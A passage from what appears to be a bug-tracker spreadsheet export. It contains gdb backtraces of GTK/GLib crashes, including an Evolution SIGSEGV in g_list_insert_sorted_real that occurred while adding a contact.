   from /usr/lib64/libgtk-x11-2.0.so.0
#55 0x0000000000435b22 in ?? ()
#56 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
#57 0x00002b26ad3dccbe in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
#58 0x00002b26ad3dde43 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
#59 0x00002b26ad3de013 in g_signal_emit () from /usr/lib64/libgobject-2.0.so.0
#60 0x0000000000434e00 in ?? ()
#61 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
#62 0x00002b26ad3dca08 in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
#63 0x00002b26ad3dde43 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
#64 0x00002b26ad3de013 in g_signal_emit () from /usr/lib64/libgobject-2.0.so.0
#65 0x00002b26abc12340 in gtk_object_destroy ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#66 0x00002b26ad3cf2e8 in g_object_unref ()
   from /usr/lib64/libgobject-2.0.so.0
#67 0x00002b26ad860359 in g_hash_table_lookup_extended ()
   from /usr/lib64/libglib-2.0.so.0
#68 0x00002b26ad86058f in g_hash_table_lookup_extended ()
   from /usr/lib64/libglib-2.0.so.0
#69 0x0000000000433bde in ?? ()
#70 0x00002b26ad3cf640 in g_object_run_dispose ()
   from /usr/lib64/libgobject-2.0.so.0
#71 0x00000000004321d6 in ?? ()
#72 0x00000000004178ac in ?? ()
#73 0x00002b26abbf3b5d in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#74 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
#75 0x00002b26ad3dca08 in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
#76 0x00002b26ad3ddc17 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
#77 0x00002b26ad3de013 in g_signal_emit () from /usr/lib64/libgobject-2.0.so.0
#78 0x00002b26abcf09ae in gtk_widget_get_default_style ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#79 0x00002b26abbee344 in gtk_main_do_event ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#80 0x00002b26ac0b0b0c in _gdk_events_init ()
   from /usr/lib64/libgdk-x11-2.0.so.0
#81 0x00002b26ad86cc84 in g_main_context_dispatch ()
   from /usr/lib64/libglib-2.0.so.0
#82 0x00002b26ad86facd in g_main_context_check ()
   from /usr/lib64/libglib-2.0.so.0
#83 0x00002b26ad86fdda in g_main_loop_run () from /usr/lib64/libglib-2.0.so.0
#84 0x00002b26abbee5f3 in gtk_main () from /usr/lib64/libgtk-x11-2.0.so.0
#85 0x000000000041453e in ?? ()
#86 0x00002b26adb120c4 in __libc_start_main () from /lib/libc.so.6
#87 0x0000000000414319 in ?? ()
#88 0x00007fff01336e18 in ?? ()
#89 0x0000000000000000 in ?? ()
Thread 1 (Thread 47445151694800 (LWP 18465)):
#0  0x00002b26ad9eaeb5 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#1  0x00002b26a99f6a07 in gnome_gtk_module_info_get ()
   from /usr/lib64/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0x00002b26adb2547b in raise () from /lib/libc.so.6
No symbol table info available.
#4  0x00002b26adb26da0 in abort () from /lib/libc.so.6
No symbol table info available.
#5  0x00002b26ad874d70 in g_logv () from /usr/lib64/libglib-2.0.so.0
No symbol table info available.
#6  0x00002b26ad874df3 in g_log () from /usr/lib64/libglib-2.0.so.0
No symbol table info available.
#7  0x00002b26ad874e76 in g_assert_warning () from /usr/lib64/libglib-2.0.so.0
No symbol table info available.
#8  0x00002b26afc3b19a in gail_tree_view_new ()
   from /usr/lib/gtk-2.0/modules/libgail.so
No symbol table info available.
#9  0x00002b26afc3c0a3 in gail_tree_view_new ()
   from /usr/lib/gtk-2.0/modules/libgail.so
No symbol table info available.
#10 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#11 0x00002b26ad3dccbe in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#12 0x00002b26ad3dde43 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#13 0x00002b26ad3de013 in g_signal_emit () from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#14 0x00002b26abcc1b86 in gtk_tree_model_sort_convert_iter_to_child_iter ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#15 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#16 0x00002b26ad3dca08 in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#17 0x00002b26ad3dde43 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#18 0x00002b26ad3de013 in g_signal_emit () from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#19 0x00002b26abcbd6b2 in gtk_tree_model_filter_convert_child_iter_to_iter ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#20 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#21 0x00002b26ad3dca08 in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#22 0x00002b26ad3dde43 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#23 0x00002b26ad3de013 in g_signal_emit () from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#24 0x00002b26abcc944e in gtk_tree_store_append ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#25 0x00000000004151ca in ?? ()
No symbol table info available.
#26 0x00000000004152ce in ?? ()
No symbol table info available.
#27 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#28 0x00002b26ad3dccbe in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#29 0x00002b26ad3dde43 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#30 0x00002b26ad3de013 in g_signal_emit () from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#31 0x0000000000434c83 in ?? ()
No symbol table info available.
#32 0x0000000000434dbb in ?? ()
No symbol table info available.
#33 0x0000000000417b40 in ?? ()
No symbol table info available.
#34 0x00000000004185df in ?? ()
No symbol table info available.
#35 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#36 0x00002b26ad3dca08 in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#37 0x00002b26ad3dde43 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#38 0x00002b26ad3e1003 in g_signal_emit_by_name ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#39 0x00002b26abccd12f in _gtk_tree_view_find_node ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#40 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#41 0x00002b26ad3dca08 in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#42 0x00002b26ad3dde43 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#43 0x00002b26ad3de013 in g_signal_emit () from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#44 0x00002b26abcc1e57 in gtk_tree_model_sort_convert_iter_to_child_iter ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#45 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#46 0x00002b26ad3dca08 in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#47 0x00002b26ad3dde43 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#48 0x00002b26ad3de013 in g_signal_emit () from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#49 0x00002b26abcbebc0 in gtk_tree_model_filter_convert_child_iter_to_iter ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#50 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#51 0x00002b26ad3dca08 in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#52 0x00002b26ad3dde43 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#53 0x00002b26ad3de013 in g_signal_emit () from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#54 0x00002b26abcc8674 in gtk_tree_store_remove ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#55 0x0000000000435b22 in ?? ()
No symbol table info available.
#56 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#57 0x00002b26ad3dccbe in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#58 0x00002b26ad3dde43 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#59 0x00002b26ad3de013 in g_signal_emit () from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#60 0x0000000000434e00 in ?? ()
No symbol table info available.
#61 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#62 0x00002b26ad3dca08 in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#63 0x00002b26ad3dde43 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#64 0x00002b26ad3de013 in g_signal_emit () from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#65 0x00002b26abc12340 in gtk_object_destroy ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#66 0x00002b26ad3cf2e8 in g_object_unref ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#67 0x00002b26ad860359 in g_hash_table_lookup_extended ()
   from /usr/lib64/libglib-2.0.so.0
No symbol table info available.
#68 0x00002b26ad86058f in g_hash_table_lookup_extended ()
   from /usr/lib64/libglib-2.0.so.0
No symbol table info available.
#69 0x0000000000433bde in ?? ()
No symbol table info available.
#70 0x00002b26ad3cf640 in g_object_run_dispose ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#71 0x00000000004321d6 in ?? ()
No symbol table info available.
#72 0x00000000004178ac in ?? ()
No symbol table info available.
#73 0x00002b26abbf3b5d in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#74 0x00002b26ad3cd48a in g_closure_invoke ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#75 0x00002b26ad3dca08 in g_signal_chain_from_overridden ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#76 0x00002b26ad3ddc17 in g_signal_emit_valist ()
   from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#77 0x00002b26ad3de013 in g_signal_emit () from /usr/lib64/libgobject-2.0.so.0
No symbol table info available.
#78 0x00002b26abcf09ae in gtk_widget_get_default_style ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#79 0x00002b26abbee344 in gtk_main_do_event ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#80 0x00002b26ac0b0b0c in _gdk_events_init ()
   from /usr/lib64/libgdk-x11-2.0.so.0
No symbol table info available.
#81 0x00002b26ad86cc84 in g_main_context_dispatch ()
   from /usr/lib64/libglib-2.0.so.0
No symbol table info available.
#82 0x00002b26ad86facd in g_main_context_check ()
   from /usr/lib64/libglib-2.0.so.0
No symbol table info available.
#83 0x00002b26ad86fdda in g_main_loop_run () from /usr/lib64/libglib-2.0.so.0
No symbol table info available.
#84 0x00002b26abbee5f3 in gtk_main () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#85 0x000000000041453e in ?? ()
No symbol table info available.
#86 0x00002b26adb120c4 in __libc_start_main () from /lib/libc.so.6
No symbol table info available.
#87 0x0000000000414319 in ?? ()
No symbol table info available.
#88 0x00007fff01336e18 in ?? ()
No symbol table info available.
#89 0x0000000000000000 in ?? ()
No symbol table info available.
#0  0x00002b26ad9eaeb5 in waitpid () from /lib/libpthread.so.0</t>
  </si>
  <si>
    <t>joao.abo.santana</t>
  </si>
  <si>
    <t>EVOLUTION-412732</t>
  </si>
  <si>
    <t>evolution crashed with SIGSEGV in g_list_insert_sorted_real()</t>
  </si>
  <si>
    <t xml:space="preserve">That bug has been opened on https://launchpad.net/bugs/88117
Binary package hint: evolution
evolution crashed when adding contact
...
Package: evolution 2.9.91-0ubuntu2
...
Debug backtrace for the crash:
#0  g_list_insert_sorted_real (list=0x899ed20 data=0x847de30 func=0xb5819c00  user_data=0x0)
    at glist.c:540
...
(gdb) thread apply all bt full
Thread 12 (process 5700):
#0  0xb7f6a410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb700c5c6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7116c3d in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#3  0xb7521c42 in g_async_queue_pop_intern_unlocked (queue=0x82f7458 try= end_time=0x0)
    at gasyncqueue.c:334
        retval = 
        __PRETTY_FUNCTION__ = g_async_queue_pop_intern_unlocked
#4  0xb71ca7e5 in e_msgport_wait (msgport=0x80e4350) at e-msgport.c:684
        msg = 
        __PRETTY_FUNCTION__ = e_msgport_wait
#5  0xb71caed8 in thread_dispatch (din=0x82f73f8) at e-msgport.c:1048
        e = 
        m = (EMsg *) 0x0
        info = 
        self = 3030076304
#6  0xb700831b in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#7  0xb710a3ee in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 11 (process 5703):
#0  0xb7f6a410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71006f3 in poll () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7541c53 in g_main_context_iterate (context=0x8329bf0 block=1 dispatch=1 self=0x8328c90) at gmain.c:2979
        got_ownership = 
        max_priority = 2147483647
        timeout = -1
        some_ready = 
        nfds = 2
        allocated_nfds = 
        fds = (GPollFD *) 0x83351d8
        __PRETTY_FUNCTION__ = g_main_context_iterate
#3  0xb7541fc9 in IA__g_main_loop_run (loop=0x8330af8) at gmain.c:2881
        got_ownership = -1223594624
        self = (GThread *) 0x8328c90
        __PRETTY_FUNCTION__ = IA__g_main_loop_run
#4  0xb750e744 in ?? () from /usr/lib/libnm_glib.so.0
No symbol table info available.
#5  0x08330af8 in ?? ()
---Type  to continue or q  to quit---
No symbol table info available.
#6  0xb700bbf0 in pthread_mutex_unlock () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#7  0xb755c9bf in g_thread_create_proxy (data=0x8330bb8) at gthread.c:591
        __PRETTY_FUNCTION__ = g_thread_create_proxy
#8  0xb700831b in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#9  0xb710a3ee in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 10 (process 5704):
#0  0xb7f6a410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb700c5c6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7116c3d in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#3  0xb7521c42 in g_async_queue_pop_intern_unlocked (queue=0x82f7458 try= end_time=0x0)
    at gasyncqueue.c:334
        retval = 
        __PRETTY_FUNCTION__ = g_async_queue_pop_intern_unlocked
#4  0xb71ca7e5 in e_msgport_wait (msgport=0x80e4350) at e-msgport.c:684
        msg = 
        __PRETTY_FUNCTION__ = e_msgport_wait
#5  0xb71caed8 in thread_dispatch (din=0x82f73f8) at e-msgport.c:1048
        e = 
        m = (EMsg *) 0x0
        info = 
        self = 3011505040
#6  0xb700831b in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#7  0xb710a3ee in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 9 (process 5707):
#0  0xb7f6a410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb700c5c6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7116c3d in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#3  0xb7521c42 in g_async_queue_pop_intern_unlocked (queue=0x82fd1e8 try= end_time=0x0)
    at gasyncqueue.c:334
        retval = 
        __PRETTY_FUNCTION__ = g_async_queue_pop_intern_unlocked
#4  0xb71ca7e5 in e_msgport_wait (msgport=0x80e4320) at e-msgport.c:684
---Type  to continue or q  to quit---
        msg = 
        __PRETTY_FUNCTION__ = e_msgport_wait
#5  0xb71caed8 in thread_dispatch (din=0x82fd188) at e-msgport.c:1048
        e = 
        m = (EMsg *) 0x0
        info = 
        self = 3003112336
#6  0xb700831b in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#7  0xb710a3ee in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 8 (process 5708):
#0  0xb7f6a410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb700c5c6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7116c3d in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#3  0xb7521c42 in g_async_queue_pop_intern_unlocked (queue=0x82f73e0 try= end_time=0x0)
    at gasyncqueue.c:334
        retval = 
        __PRETTY_FUNCTION__ = g_async_queue_pop_intern_unlocked
#4  0xb71ca7e5 in e_msgport_wait (msgport=0x80e4338) at e-msgport.c:684
        msg = 
        __PRETTY_FUNCTION__ = e_msgport_wait
#5  0xb71caed8 in thread_dispatch (din=0x82f7380) at e-msgport.c:1048
        e = 
        m = (EMsg *) 0x0
        info = 
        self = 2994523024
#6  0xb700831b in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#7  0xb710a3ee in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 7 (process 6057):
#0  0xb7f6a410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71006f3 in poll () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7541c53 in g_main_context_iterate (context=0x887c8f8 block=1 dispatch=1 self=0x8710538) at gmain.c:2979
        got_ownership = 
        max_priority = 2147483647
        timeout = -1
        some_ready = 
---Type  to continue or q  to quit---
        nfds = 1
        allocated_nfds = 
        fds = (GPollFD *) 0x89b4778
        __PRETTY_FUNCTION__ = g_main_context_iterate
#3  0xb7541fc9 in IA__g_main_loop_run (loop=0x878e3f0) at gmain.c:2881
        got_ownership = -1223594624
        self = (GThread *) 0x8710538
        __PRETTY_FUNCTION__ = IA__g_main_loop_run
#4  0xb71ee772 in startup_mainloop (arg=0x0) at e-book.c:3764
        loop = (GMainLoop *) 0xfffffffc
#5  0xb755c9bf in g_thread_create_proxy (data=0x8710538) at gthread.c:591
        __PRETTY_FUNCTION__ = g_thread_create_proxy
#6  0xb700831b in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#7  0xb710a3ee in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 6 (process 6060):
#0  0xb7f6a410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71006f3 in poll () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb7541c53 in g_main_context_iterate (context=0x8578df8 block=1 dispatch=1 self=0x8a12c48) at gmain.c:2979
        got_ownership = 
        max_priority = 2147483647
        timeout = -1
        some_ready = 
        nfds = 10
        allocated_nfds = 
        fds = (GPollFD *) 0x89589b0
        __PRETTY_FUNCTION__ = g_main_context_iterate
#3  0xb7541fc9 in IA__g_main_loop_run (loop=0x882e110) at gmain.c:2881
        got_ownership = -1223594624
        self = (GThread *) 0x8a12c48
        __PRETTY_FUNCTION__ = IA__g_main_loop_run
#4  0xb7c064a0 in ?? () from /usr/lib/libORBit-2.so.0
No symbol table info available.
#5  0x0882e110 in ?? ()
No symbol table info available.
#6  0xb75a54e8 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0xb15c73c8 in ?? ()
No symbol table info available.
#8  0xb755c9bf in g_thread_create_proxy (data=0x8a12c48) at gthread.c:591
        __PRETTY_FUNCTION__ = g_thread_create_proxy
Backtrace stopped: frame did not save the PC
---Type  to continue or q  to quit---
Thread 5 (process 6816):
#0  0xb7f6a410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb700eec1 in __lll_mutex_unlock_wake () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb700bbf9 in _L_mutex_unlock_61 () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#3  0xb700b860 in __pthread_mutex_unlock_usercnt () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#4  0xb700bbf0 in pthread_mutex_unlock () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb7116dd6 in pthread_mutex_unlock () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#6  0xb71ed319 in e_book_view_listener_queue_response (listener=0x849f060 response=)
    at e-book-view-listener.c:102
No locals.
#7  0xb71e6dff in _ORBIT_skel_small_GNOME_Evolution_Addressbook_BookViewListener_notifyContactsAdded (
    _o_servant=0x849f074 _o_retval=0x0 _o_args=0xaff89180 _o_ctx=0xaff891f8 _o_ev=0xaff892c8 
    _impl_notifyContactsAdded=0xb71ed680 )
    at Evolution-DataServer-Addressbook-common.c:16
No locals.
#8  0xb7bfa767 in ?? () from /usr/lib/libORBit-2.so.0
No symbol table info available.
#9  0x0849f074 in ?? ()
No symbol table info available.
#10 0x00000000 in ?? ()
No symbol table info available.
Thread 4 (process 6817):
#0  0xb710a3d8 in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#1  0x007d0f00 in ?? ()
No symbol table info available.
#2  0x00000000 in ?? ()
No symbol table info available.
Thread 3 (process 6818):
#0  0xb710a3d8 in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#1  0x007d0f00 in ?? ()
No symbol table info available.
#2  0x00000000 in ?? ()
No symbol table info available.
Thread 2 (process 6819):
---Type  to continue or q  to quit---
#0  0xb710a3d8 in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#1  0x007d0f00 in ?? ()
No symbol table info available.
#2  0x00000000 in ?? ()
No symbol table info available.
Thread 1 (process 5685):
#0  g_list_insert_sorted_real (list=0x899ed20 data=0x847de30 func=0xb5819c00  user_data=0x0)
    at glist.c:540
        tmp_list = 
        cmp = 
        __PRETTY_FUNCTION__ = g_list_insert_sorted_real
#1  0xb5819be7 in create_contact (book_view=0x8d9d9d0 contacts=0x8e8dd70 ctxt=0x8e752b0) at e-contact-print.c:498
        contact = (EContact *) 0x847de30
#2  0xb75bcf89 in IA__g_cclosure_marshal_VOID__POINTER (closure=0x8e85f10 return_value=0x0 n_param_values=2 
    param_values=0xbfde4f3c invocation_hint=0xbfde4e4c marshal_data=0xb5819ba0) at gmarshal.c:601
        data1 = (gpointer) 0x8d9d9d0
        data2 = 
        __PRETTY_FUNCTION__ = IA__g_cclosure_marshal_VOID__POINTER
#3  0xb75b062b in IA__g_closure_invoke (closure=0x8e85f10 return_value=0x0 n_param_values=2 param_values=0xbfde4f3c 
    invocation_hint=0xbfde4e4c) at gclosure.c:490
        marshal = (GClosureMarshal) 0xb75bcf30 
        marshal_data = (gpointer) 0x0
        __PRETTY_FUNCTION__ = IA__g_closure_invoke
#4  0xb75c10f3 in signal_emit_unlocked_R (node=0x85cd350 detail=0 instance=0x8d9d9d0 emission_return=0x0 
    instance_and_params=0xbfde4f3c) at gsignal.c:2440
        tmp = 
        handler = (Handler *) 0x85640e0
        accumulator = (SignalAccumulator *) 0x0
        emission = {next = 0xbfde52d4 instance = 0x8d9d9d0 ihint = {signal_id = 513 detail = 0 
    run_type = G_SIGNAL_RUN_FIRST} state = EMISSION_RUN chain_type = 4}
        class_closure = (GClosure *) 0x8882bd8
        handler_list = (Handler *) 0x85640e0
        return_accu = (GValue *) 0x0
        accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 
      v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
      v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
        signal_id = 513
        max_sequential_handler_number = 25243
        return_value_altered = 0
#5  0xb75c2617 in IA__g_signal_emit_valist (instance=0x8d9d9d0 signal_id=513 detail=0 
    var_args=0xbfde5180 pï¿½]ï¿½pï¿½]ï¿½ï¿½QÞ¿\211ï¿½[ï¿½`ï¿½I\b\210ï¿½v\bï¿½ï¿½ï¿½\b\002) at gsignal.c:2199
        _flags = 
        _vtable = 
        _cvalues = {{v_int = -1210897954 v_long = -1210897954 v_int64 = 3084069342 v_double = 1.5237327112744183e-314 
---Type  to continue or q  to quit---
    v_pointer = 0xb7d329de} {v_int = 1081032704 v_long = 1081032704 v_int64 = 1081032704 
    v_double = 5.3410112107726911e-315 v_pointer = 0x406f4000} {v_int = 1078689792 v_long = 1078689792 
    v_int64 = 1078689792 v_double = 5.329435687468399e-315 v_pointer = 0x404b8000} {v_int = 1081339904 
    v_long = 1081339904 v_int64 = 1081339904 v_double = 5.3425289804367154e-315 v_pointer = 0x4073f000} {
    v_int = 1079115776 v_long = 1079115776 v_int64 = 639199814576373760 v_double = 5.9882086717411817e-266 
    v_pointer = 0x40520000} {v_int = 58657919 v_long = 58657919 v_int64 = 58657919 
    v_double = 2.8980862634438527e-316 v_pointer = 0x37f0c7f} {v_int = 1078689792 v_long = 1078689792 
    v_int64 = 1078689792 v_double = 5.329435687468399e-315 v_pointer = 0x404b8000} {v_int = 1081032704 
    v_long = 1081032704 v_int64 = -5270314875616280576 v_double = -1.9674405469902152e-44 v_pointer = 0x406f4000}}
        _lcopy_format = 
        _n_values = 
        return_value = {g_type = 1072693248 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
      v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
        error = 
        instance_and_params = (GValue *) 0xbfde4f3c
        stack_values = {{g_type = 143992840 data = {{v_int = 148494800 v_uint = 148494800 v_long = 148494800 
        v_ulong = 148494800 v_int64 = 148494800 v_uint64 = 148494800 v_float = 1.31114199e-33 
        v_double = 7.3366179266066737e-316 v_pointer = 0x8d9d9d0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
        v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 68 data = {{
        v_int = 149478768 v_uint = 149478768 v_long = 149478768 v_ulong = 149478768 v_int64 = 149478768 
        v_uint64 = 149478768 v_float = 1.40150518e-33 v_double = 7.3852324051473857e-316 v_pointer = 0x8e8dd70} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
        v_pointer = 0x0}}} {g_type = 1232 data = {{v_int = 142 v_uint = 142 v_long = 142 v_ulong = 142 
        v_int64 = 751619276942 v_uint64 = 751619276942 v_float = 1.98984382e-43 v_double = 3.7134926348907998e-312 
        v_pointer = 0x8e} {v_int = 54 v_uint = 54 v_long = 54 v_ulong = 54 v_int64 = 644051855231418422 
        v_uint64 = 644051855231418422 v_float = 7.56701171e-44 v_double = 1.2507417000505078e-265 v_pointer = 0x36}}} 
  {g_type = 256 data = {{v_int = -1218662172 v_uint = 3076305124 v_long = -1218662172 v_ulong = 3076305124 
        v_int64 = 589468802570039524 v_uint64 = 589468802570039524 v_float = -1.31542074e-05 
        v_double = 2.8595675646860345e-269 v_pointer = 0xb75cb0e4} {v_int = 16 v_uint = 16 v_long = 16 v_ulong = 16 
        v_int64 = -4621168515942973424 v_uint64 = 13825575557766578192 v_float = 2.24207754e-44 
        v_double = -0.47361564636230558 v_pointer = 0x10}}} {g_type = 3084112732 data = {{v_int = 149955008 
        v_uint = 149955008 v_long = 149955008 v_ulong = 149955008 v_int64 = 4674261252538638784 
        v_uint64 = 4674261252538638784 v_float = 1.44524092e-33 v_double = 31039.375545533141 v_pointer = 0x8f021c0} {
